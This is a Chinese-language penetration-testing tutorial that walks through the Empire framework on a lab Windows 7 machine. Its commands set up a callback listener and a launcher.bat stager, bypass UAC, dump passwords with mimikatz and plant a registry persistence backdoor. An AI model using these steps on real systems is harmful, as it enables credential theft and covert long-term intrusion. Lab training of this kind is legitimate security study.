Empire之权限提升获取账号密码和注册表留持久后门

admin 2023年10月31日10:09:23评论8 views字数 961阅读3分12秒阅读模式

欢迎回来,我的新手黑客

      Empire是一个开发后框架,包括纯PowerShell2.0 Windows代理和纯Python 2.6 / 2.7 Linux / OS X代理。它是以前的PowerShell Empire和Python EmPyre项目的合并。该框架提供了密码安全的通信和灵活的体系结构。在PowerShell方面,Empire实现了运行PowerShell代理的能力,而无需powershell.exe,从键盘记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中




使用Empire设置监听器,进入监听器模块

Empire之权限提升获取账号密码和注册表留持久后门

使用http类型的监听器

uselistener http

Empire之权限提升获取账号密码和注册表留持久后门

查看模块参数

info

修改name参数和BindIP

set Name win7set BindIP 192.168.0.104

Empire之权限提升获取账号密码和注册表留持久后门

激活监听器

execute

Empire之权限提升获取账号密码和注册表留持久后门

生成木马

Empire之权限提升获取账号密码和注册表留持久后门

使用launcher_bat

usestager windows/launcher_batinfo

Empire之权限提升获取账号密码和注册表留持久后门

set Listener win7

在/tmp路径下生成launcher.bat文件

Empire之权限提升获取账号密码和注册表留持久后门

等待用户上线

Empire之权限提升获取账号密码和注册表留持久后门

查看agent

agent

Empire之权限提升获取账号密码和注册表留持久后门

将agent命名一个比较好记的名字

Empire之权限提升获取账号密码和注册表留持久后门

进入agent

interact win7

Empire之权限提升获取账号密码和注册表留持久后门

查看信息

info

Empire之权限提升获取账号密码和注册表留持久后门

没有权限,查看该用户是否在Administrators组里

shell net localgroup Administrators

Empire之权限提升获取账号密码和注册表留持久后门

该用户在管理员组,因为UAC的原因所以没有管理员权限,接着来尝试PassUAC

bypassuac win7

Empire之权限提升获取账号密码和注册表留持久后门

提权成功,查看agent

Empire之权限提升获取账号密码和注册表留持久后门

带*号的为管理员权限的agent,修改Name,进入该agent

Empire之权限提升获取账号密码和注册表留持久后门

查看简要信息

Empire之权限提升获取账号密码和注册表留持久后门

权限满足要求,提取该设备上账号密码信息

mimikatz

Empire之权限提升获取账号密码和注册表留持久后门

一会儿之后,查看账号密码

creds

Empire之权限提升获取账号密码和注册表留持久后门

使用rdesktop登录

Empire之权限提升获取账号密码和注册表留持久后门

接下来来看一下持久后门

usemodule persistence/elevated/registry*

Empire之权限提升获取账号密码和注册表留持久后门

查看模块简要信息

Empire之权限提升获取账号密码和注册表留持久后门

设置参数

set Listener win7

Empire之权限提升获取账号密码和注册表留持久后门

查看靶机注册表相应位置

Empire之权限提升获取账号密码和注册表留持久后门

接下来测试一下持久后门,靶机重新开机

Empire之权限提升获取账号密码和注册表留持久后门

成功回连,持久后门生效




原创不易,帮我点点右下角的“在看”吧,欢迎转发跟同行分享,谢谢

Empire之权限提升获取账号密码和注册表留持久后门


原文始发于微信公众号(Kali渗透测试教程):Empire之权限提升获取账号密码和注册表留持久后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日10:09:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Empire之权限提升获取账号密码和注册表留持久后门http://cn-sec.com/archives/971819.html

发表评论

匿名网友 填写信息